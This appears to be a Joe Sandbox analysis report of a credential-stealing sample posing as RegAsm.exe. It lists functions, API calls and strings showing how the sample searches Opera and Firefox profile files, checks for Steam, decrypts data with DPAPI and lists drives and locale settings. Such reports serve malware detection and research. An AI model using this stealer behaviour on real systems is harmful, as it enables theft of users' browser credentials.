Instruction ID: c4940adc854a3ba67b8212d5ab6a5c1d6170e86c79dd6eed9eac1987fc902813
Opcode Fuzzy Hash: d7abd2f1d3e31d68af85648043620988cd0df894e8726762b28a7fa20c398402
Instruction Fuzzy Hash: 28513FB190021C9FCF60DB64DC89BD9BBBDEB48305F0044E6A609E3250EB359B85CF69

Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,00436822,?,?,?), ref: 0040BFC5
StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
StrCmpCA.SHLWAPI(?,Opera,0043682F,0043682E,0043682B,0043682A,00436827,00436826,00436823), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

Opera, xrefs: 0040C083
Opera GX, xrefs: 0040C091
Opera Crypto, xrefs: 0040C09F
\*.*, xrefs: 0040BF73

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: 327d03bf2fe941ddf6aca562c78bce6492d49f077019537824e1ecd5857584a3
Instruction ID: 72ff7a1e9eb5c149ac6808038dd5c1d8de9da8b4cff57bb790aa67665e740689
Opcode Fuzzy Hash: 327d03bf2fe941ddf6aca562c78bce6492d49f077019537824e1ecd5857584a3
Instruction Fuzzy Hash: A7020C71A4012D9BCB21FB26DD466CD7775AF14308F4141EAB948B3192DBB86EC98FC8

Function 00414F0C Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00414F8C
_memset.LIBCMT ref: 00414FAF
GetDriveTypeA.KERNEL32(?), ref: 00414FB8
lstrcpyA.KERNEL32(?,?), ref: 00414FD8
lstrcpyA.KERNEL32(?,?), ref: 00414FF3

Part of subcall function 00414A92: wsprintfA.USER32 ref: 00414AE6
Part of subcall function 00414A92: FindFirstFileA.KERNEL32(?,?), ref: 00414AFD
Part of subcall function 00414A92: _memset.LIBCMT ref: 00414B19
Part of subcall function 00414A92: _memset.LIBCMT ref: 00414B2A
Part of subcall function 00414A92: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414B4B
Part of subcall function 00414A92: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414B65
Part of subcall function 00414A92: wsprintfA.USER32 ref: 00414B8C
Part of subcall function 00414A92: StrCmpCA.SHLWAPI(?,004365D7), ref: 00414BA0
Part of subcall function 00414A92: wsprintfA.USER32 ref: 00414BC9
Part of subcall function 00414A92: _memset.LIBCMT ref: 00414BF2
Part of subcall function 00414A92: lstrcatA.KERNEL32(?,?), ref: 00414C07

lstrcpyA.KERNEL32(?,00000000), ref: 00415014
lstrlenA.KERNEL32(?), ref: 0041508E

Strings

*%DRIVE_REMOVABLE%*, xrefs: 00414F59
%DRIVE_FIXED%, xrefs: 00414FFA
%DRIVE_REMOVABLE%, xrefs: 00414FDF
*%DRIVE_FIXED%*, xrefs: 00414F28

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: 8ecb2915475784160bf19b5b5c3fd1b209985622b84c6bf3e7513c2042010d98
Instruction ID: 66397c6df7b49d9af810fe206f5de00c2742e564c688bb4e8d7344be11effc3c
Opcode Fuzzy Hash: 8ecb2915475784160bf19b5b5c3fd1b209985622b84c6bf3e7513c2042010d98
Instruction Fuzzy Hash: 81512EB190021CAFDF219FA1DC85BDA7BB9FB05304F1040AAAA48A7211EB355E85CF59

Function 00401D80 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

FindFirstFileA.KERNEL32(?,?,0043AA54,0043AA58), ref: 00401FA4
StrCmpCA.SHLWAPI(?,0043AA5C), ref: 00401FD7
StrCmpCA.SHLWAPI(?,0043AA60), ref: 00401FF1
FindFirstFileA.KERNEL32(?,?,0043AA64,0043AA68,?,0043AA6C,004369E3), ref: 004020DD

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

FindNextFileA.KERNEL32(?,?), ref: 004023A2
FindClose.KERNEL32(?), ref: 004023B6
FindNextFileA.KERNEL32(?,?), ref: 004026C6
FindClose.KERNEL32(?), ref: 004026DA

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00416DAB: CreateThread.KERNEL32(00000000,00000000,00416CDA,?,00000000,00000000), ref: 00416E4A
Part of subcall function 00416DAB: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E52

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366D6,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416DAB: Sleep.KERNEL32(000003E8,?,?), ref: 00416E12

Strings

\*.*, xrefs: 00401E9E

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1116797323-1173974218
Opcode ID: 6158643a2eaa735e65b03effbbe0e70a8a814b0f26e8530c9142101a3da574f4
Instruction ID: a593c3cf04b4372ee7a1e104cb070c40d622a6369388c59100e8effdd9ac76d7
Opcode Fuzzy Hash: 6158643a2eaa735e65b03effbbe0e70a8a814b0f26e8530c9142101a3da574f4
Instruction Fuzzy Hash: 3C32FE71A412299BCF21FB25DD4A6CD7375AF04308F5100EAB548771A1DBB8AFC98F98

Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437570,00436873,?,?,?), ref: 0040D647
StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,0043687B), ref: 0040D70E

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366D6,?), ref: 00411C79

CopyFileA.KERNEL32(?,?,00000001,0043758C,0043687F), ref: 0040D7E8
DeleteFileA.KERNEL32(?), ref: 0040D8B3
FindNextFileA.KERNELBASE(?,?), ref: 0040D956
FindClose.KERNEL32(?), ref: 0040D96A

Strings

prefs.js, xrefs: 0040D702

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: c03d13fe9fb3da740e4586efa19dd28fbf2b3791ca619663c81982bc600ee227
Instruction ID: 025c0a4d4b8645f896f9adebbe0b9e2206dd27b7a02ef1371874b52ef0ae4f8a
Opcode Fuzzy Hash: c03d13fe9fb3da740e4586efa19dd28fbf2b3791ca619663c81982bc600ee227
Instruction Fuzzy Hash: D0A1FC71D002289BCB60FB65DD46BCD7775AF04318F4141EAA808B7291DB78AEC98FD9

Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
Process32First.KERNEL32(00000000,00000128), ref: 004124E4
Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 789a36a84d8bbc8b55fe8f3de50f0990988272b4edcd63c543404e4a6a74a09d
Instruction ID: fe9e7d6a07132a74c84dbd9c0c9c8a901928ea110952a9d0ee2f05479bf09201
Opcode Fuzzy Hash: 789a36a84d8bbc8b55fe8f3de50f0990988272b4edcd63c543404e4a6a74a09d
Instruction Fuzzy Hash: 7B012170A012249FDB719F649D45BEE77F9EF08301F5001E6A509E2250EB388F80CF18

Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

GetKeyboardLayoutList.USER32(00000000,00000000,004366DF,?,?), ref: 00410E0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

LocalFree.KERNEL32(?), ref: 00410EFF

Strings

/ , xrefs: 00410E73

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: c23505a73b74e49a66c258b0daaebb513899023d5fafe71d95c8f2e19d289606
Instruction ID: 5d77fd5618e27f4f6506184c9bed09feb32abd33f6989f8be8429915886b6d2b
Opcode Fuzzy Hash: c23505a73b74e49a66c258b0daaebb513899023d5fafe71d95c8f2e19d289606
Instruction Fuzzy Hash: 40314F71900328AFCB20AF65DD89BDEB7B9AB04304F5041EAF519A7152CBB85EC58F54

Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417D2E,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
StrCmpCA.SHLWAPI(?), ref: 004125DC
CloseHandle.KERNEL32(00000000), ref: 004125F0

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: 1d18cac075d243630958b18a56a9b8e68d8696d03d8e861460d4d6b871736f70
Instruction ID: c977fa2023861d3560b6e2fb0cc78a20c4bc4113a8c7db9495efa13d5c3e76f1
Opcode Fuzzy Hash: 1d18cac075d243630958b18a56a9b8e68d8696d03d8e861460d4d6b871736f70
Instruction Fuzzy Hash: E6018131601324AFD7619B709D48BEE7AFE9F14301F4400EAA40DE3212EB788F849F29

Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004080C4
LocalAlloc.KERNEL32(00000040,?), ref: 004080D8
LocalFree.KERNEL32(?), ref: 004080FD

Strings

DPAPI, xrefs: 004080A9

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 32d26018ddfe47d62121d168dc6b3bb6702a61732c5bc7aa498c107cafa00823
Instruction ID: 141b5955555d0c4e320c09078e0ef2b570c2520fcfd848a4ac7c164190c77c55
Opcode Fuzzy Hash: 32d26018ddfe47d62121d168dc6b3bb6702a61732c5bc7aa498c107cafa00823
Instruction Fuzzy Hash: B601FF75A01218EFCB00DFA8D8849AEBBF9FF48754B118066E906E7341D7719E01CB94

Function 61EAD2AC Relevance: 6.6, Strings: 5, Instructions: 334COMMON

Download Yara Rule

Strings

BINARY, xrefs: 61EAD40C, 61EAD478, 61EAD4A0
main, xrefs: 61EAD638
RTRIM, xrefs: 61EAD507
kqa, xrefs: 61EAD645
NOCASE, xrefs: 61EAD4C8

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: strcmp
String ID: BINARY$NOCASE$RTRIM$kqa$main
API String ID: 1004003707-114998471
Opcode ID: 75fc9da15e3eae02c5828edd43cd5c0992130a24dbe0624c6cd673bee28d4025
Instruction ID: 60bcc8b0197c989f7013f8b1edc5a9d28cf944306873f66ca73508c1f88d5ce1
Opcode Fuzzy Hash: 75fc9da15e3eae02c5828edd43cd5c0992130a24dbe0624c6cd673bee28d4025
Instruction Fuzzy Hash: DEE149B4A087858BEB00DF68C59474ABBF1BF89308F24C86DEC989F395D779C8458B51

Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436703,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542
CloseHandle.KERNEL32(00000000), ref: 0041154D

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: f043c58e45d45994532b3eb101c111be7e0f7d396fdc1ddb1e3db2322b7cbcf6
Instruction ID: fb6ccf6a4dc5d5211df5a61f8bbb009e1a718573f8a4bacbf711e3e96254fafb
Opcode Fuzzy Hash: f043c58e45d45994532b3eb101c111be7e0f7d396fdc1ddb1e3db2322b7cbcf6
Instruction Fuzzy Hash: 44118671A00214ABC721BB65DC85BFD77E9AF48718F400097F905A3251DF789EC58F68

Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
HeapAlloc.KERNEL32(00000000), ref: 00410D50
GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
wsprintfA.USER32 ref: 00410D7D

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
